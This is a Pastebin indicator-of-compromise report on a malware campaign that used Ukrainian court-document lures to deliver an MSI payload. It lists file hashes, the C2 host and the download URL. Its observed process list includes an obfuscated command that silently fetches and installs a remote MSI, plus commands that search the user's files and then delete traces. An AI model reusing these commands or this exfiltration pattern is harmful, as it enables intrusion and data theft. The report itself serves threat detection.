API tools faq
paste
VRad

#autoit_240721

VRad
Aug 5th, 2021 (edited)
850
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.24 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #Autoit #MSI #CDFv2
  2.  
  3. https://pastebin.com/qHHUgBNK
  4.  
  5. previous_contact:
  6. 12/04/21 https://pastebin.com/yBpP4PPw
  7.  
  8. FAQ:
  9. https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
  10.  
  11. attack_vector
  12. --------------
  13. email > attach .doc & .xlam > decode by passwd > VBA Macro > GET MSI > %appdata%\Josh Close\CsvHelper\csvhelper.exe > exfil to 45.146.165.91:8080
  14.  
  15.  
  16. email_headers
  17. --------------
  18. n/a
  19.  
  20.  
  21. files
  22. --------------
  23. SHA-256 4acfcccf535da0686c8343c7eeb0c450e6021fca20a9b1a02211aaf0e6c9dc13
  24. File name Повістка_до суду - Михайло Васильович №3.doc [ CDF V2 Document ] - bad passwd or corrupted. cant extract
  25. File size 263.50 KB (269824 bytes)
  26.  
  27. SHA-256 882597c251905f9be31352ba034835764124c9a9e25ef1ba0150e5998c621f07
  28. File name копії судових документів - Мих.xlam [ CDF V2 Document ]
  29. File size 22.00 KB (22528 bytes)
  30.  
  31. SHA-256 8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a
  32. File name копії судових документів - Мих.xlam [ Office Open XML Spreadsheet ]
  33. File size 15.79 KB (16164 bytes)
  34.  
  35. SHA-256 e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909
  36. File name 240721-1.msi [ Windows Installer ]
  37. File size 6.46 MB (6770688 bytes)
  38.  
  39. SHA-256 700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901
  40. File name se1.exe [ PE32 executable for MS Windows] BobSoft Mini Delphi -> BoB / BobSoft
  41. File size 16.47 MB (17274187 bytes)
  42.  
  43. SHA-256 17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f
  44. File name csvhelper.exe [ PE32 executable for MS Windows ]
  45. File size 6.93 MB (7266816 bytes)
  46.  
  47. activity
  48. **************
  49. PL_SCR http://2215.site/240721-1.msi
  50.  
  51. C2 45.146.165.91:8080/upld/
  52.  
  53.  
  54. netwrk
  55. --------------
  56. 45.146.165.91 2215.site GET /240721-1.msi HTTP/1.1 Windows Installer
  57. 45.146.165.91 45.146.165.91:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0
  58.  
  59. comp
  60. --------------
  61. msiexec.exe 2504 TCP 45.146.165.91 80 ESTABLISHED
  62. csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
  63. csvhelper.exe 3132 TCP 45.146.165.91 8080 ESTABLISHED
  64.  
  65. proc
  66. --------------
  67. C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
  68. C:\Windows\SysWOW64\cmd.exe /c P^i^ng 127.0.0.1 -n 66 > nuL && m^S^Ie^X^e^C /i http://2215.site/240721-1.msi /qn
  69. C:\Windows\SysWOW64\PING.EXE 127.0.0.1 -n 66
  70. C:\Windows\SysWOW64\msiexec.exe /i http://2215.site/240721-1.msi /qn
  71.  
  72.  
  73. C:\Windows\system32\msiexec.exe /V
  74. C:\Windows\syswow64\MsiExec.exe -Embedding 5603E1E9BABB29850E6EDC59A79FB67D
  75. "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
  76. C:\tmp\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
  77. C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\csvhelper.exe
  78.  
  79. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
  80. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
  81. ...
  82. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A
  83.  
  84. C:\Windows\SysWOW64\cmd.exe cmd /c start /min r.bat
  85. C:\Windows\system32\cmd.exe /K r.bat
  86. C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\operator\AppData\Roaming\Josh Close\CsvHelper\r.bat"
  87. C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F
  88.  
  89. persist
  90. --------------
  91. n/a
  92.  
  93. drop
  94. --------------
  95. %tmp%\MW-e311c016-8944-4faf-b4a3-b4689444f124\files\se1.exe
  96. %appdata%\Josh Close\CsvHelper\csvhelper.exe
  97.  
  98. # # #
  99. VT details
  100. https://www.virustotal.com/gui/file/8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a/details
  101. https://www.virustotal.com/gui/url/5cb4eaeb4d3c3a0d086bcc60b1f4a2d0247cbb78a14f5818e1ae3681b3c75aab/details
  102. https://urlscan.io/result/ddba54d9-71b0-447e-8882-3c4f1cecb4f2/
  103. https://www.virustotal.com/gui/file/e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909/details
  104. https://www.virustotal.com/gui/file/700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901/details
  105. https://www.virustotal.com/gui/file/17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f/details
  106. https://analyze.intezer.com/analyses/8fc75e5a-ef6e-48a1-8510-e8945272b9dc
  107. https://analyze.intezer.com/analyses/fc99be4a-a1aa-4c62-a31c-630fd2a5bfbc
  108.  
  109. VR
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!